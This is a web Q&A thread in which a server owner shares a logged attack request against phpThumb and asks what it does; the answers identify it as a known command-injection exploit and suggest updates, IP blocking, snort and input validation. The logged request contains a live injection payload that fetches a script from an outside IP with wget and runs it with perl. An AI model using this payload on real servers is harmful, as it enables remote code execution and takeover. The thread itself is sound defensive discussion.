# I wrote an error logging script that logs all inputs and other things

Tags: php, linux, security, ubuntu

I'm getting errors from an attacker i believe.. what are they trying to do and how to stop them? Here is the log:

```
Monday 26th of December 2011 12:10:18 PM
src=file.jpg&fltr[]=blur|
9%20-quality%20%2075%20interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 
91.121.133.22 
| 39757 
| /var/www/class.php 
| /class/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9
```

[src = file.jpg] - [fltr = Array] - [phpThumbDebug = 9] -

I've separated the areas to new lines. Most of it is inputs and then there is the server port, their ip address, the script they accessed. definitely looks like they were trying to use an exploit to access command line. but this is not the script they think it is.

Comment: You can try blocking their IPs etc, but the best defense is simply having everything updated and using safe software.

Comment: as stu said, open up your access logs, there will be tons and tons of attacks, weird user agents, people fishing for exploits

Comment: This question appears to be off-topic because it is not about programming, and instead is about security. You might try [security.se] or [su].

Answer (score 3):

Webservers get attacked all the time. Any given attack is trying to pick off a particular program.
If you write your software well and validate all your inputs, your system should be able to tolerate garbage like that and politely ignore it.
It's not like a DOS attack, if it's only happening 3 times a day. 
If you want to go nuts you can write a script to scan the logs, if you see a known pattern of attack, run a script to block the ip from getting to your webserver after N number of hits.

Comment: keep your system updated and probably whatever program they're attacking has already been fixed.

Answer (score 0):

It appears there is a command injection exploit in the fltr[] parameter of phpThumb

http://www.securityfocus.com/bid/39605/exploit

http://www.juniper.net/security/auto/vulnerabilities/vuln39605.html

Comment: that's fine cause i don't have any public software on my server

Answer (score 0):

If all attacks originate from the same IP Address then you can use iptables to block that IP from accessing your server. You can have it do it temporarily or permanently by writing an script.
This solution presumes that you have root/sudo access to the server you are hosting on.
You can also explore snort which is pretty effective for known (and common) exploit payloads and strings.

In the end, nothing beats solid input validation when it comes to prevent common web based attacks !